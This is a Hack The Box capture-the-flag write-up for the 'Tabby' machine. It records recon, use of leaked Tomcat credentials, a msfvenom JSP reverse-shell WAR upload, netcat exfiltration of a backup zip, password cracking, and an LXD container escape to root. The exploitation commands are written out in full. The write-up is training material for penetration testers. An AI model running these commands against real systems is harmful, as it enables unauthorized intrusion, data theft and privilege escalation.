[HTB] Tabby — Writeup

Image for post
Image for post
  • Tomcat JSP Script Exploit
  • Password Protected .zip File Abuse
  • Linux LXD Container Breakout

Initial Recon

Nmap

Let’s begin with an initial port scan:

$ nmap -Pn --open -p- -sC -sV 10.10.10.194PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Interesting Ports to Note

  • HTTP (80/TCP) — Mega Hosting Web page.
Image for post
Image for post
Image for post
Image for post

Initial Foothold

LFI (Mega Hosting Website)

By looking at the source code for the web page, we can discover the domain name megahosting.htb. Let’s add that into our /etc/hosts file.

Image for post
Image for post
User: tomcat
Pass: $3cureP4s5w0rd123!
Image for post
Image for post
Image for post
Image for post
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f war > bigb0ss.war
$ curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file bigb0ss.war 'http://10.10.10.194:8080/manager/text/deploy?path=/bigb0ss'OK - Deployed application at context path [/bigb0ss]
Image for post
Image for post

Privilege Escalation

tomcat → ash

Further enumeration found that there is a directory called /var/www/html/files which is owned by the user ash.

Image for post
Image for post
Image for post
Image for post
# Kali Box
$ nc -lvnp 80 > backup.zip
# Tabby Box
$ nc 10.10.14.3 80 < 16162020_backup.zip
Image for post
Image for post
Image for post
Image for post
# zip2john
$ zip2john backup.zip > bakcup-prep.zip
# John
$ john --wordlist=/usr/share/wordlists/rockyou.txt bakcup-prep.zip
Image for post
Image for post

user.txt

The recovered password was indeed valid to unzip the file; however, there was nothing. Instead, that was a correct password for the ash user. We can now login as ash and read the user.txt flag.

Image for post
Image for post

ash → root (LXD Privilege Escalation)

From the above image, we can see that ash is member of the LXD group. It is a Linux Daemon (LXD) that is a lightweight container hypervisor. And there is a known privilege escalation path for a local user that is part of the LXD group to gain root access on the system. More details about the attack can be found [here] (https://www.hackingarticles.in/lxd-privilege-escalation/).

$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ sudo bash build-alpine
Image for post
Image for post
Image for post
Image for post
Image for post
Image for post
# Initiating the LXD (*Answer things for default setting)
$ lxd init
# Import Image
$ lxc image import ./alpine-v3.12-x86_64-20201030_0034.tar.gz --alias bigb0ss
$ lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| bigb0ss | c57d8b79d13e | no | alpine v3.12 (20201030_00:34) | x86_64 | CONTAINER | 3.07MB | Oct 30, 2020 at 4:58am (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
$ lxc init bigb0ss priv -c security.privileged=true
$ lxc config device add priv mydevice disk source=/ path=/mnt/root recursive=true
$ lxc start priv
$ lxc exec priv /bin/sh~ # ^[[51;5Rid
id
uid=0(root) gid=0(root)
~ # ^[[51;5Rcat /mnt/root/root/root.txt
cat /mnt/root/root/root.txt
b0d...REDACTED...d7c

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store